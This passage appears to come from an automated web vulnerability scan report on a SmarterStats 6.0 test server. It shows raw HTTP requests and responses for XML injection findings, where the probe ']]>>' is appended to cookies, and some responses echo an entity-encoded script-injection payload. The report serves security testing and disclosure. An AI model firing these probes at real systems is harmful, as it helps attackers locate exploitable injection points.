yUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%2BKPo4AdkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyvU7iaHYBbKQeGtHw6kNdeUAPWDYACUzT5UpfA6p01Wc%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:14:43 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 7329

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |119|updatePanel|ctl00_MPH_UP1|
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5424|hiddenField|__VIEWSTATE|/wEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhoCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o+jgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwkGAABowSlcoQkeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8MBQxTbWFydGVyVG9vbHMfCmgfCAYAQMr4o+jgBx8GBRMyMDEwLTEwLTAzLTAwLTAwLTAwZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA+AxcNc0IHwgGAEDK+KPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMDktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFywy7nD9wqtpvmhXeCItS/kWODseFqIeWVVOiNixRT0QY=|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|76|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard%27%27&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

3. XML injection  previous  next
There are 20 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


3.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}]]>>; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:47 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=]]>>
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:49 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [SelectedLanguage cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:42 GMT
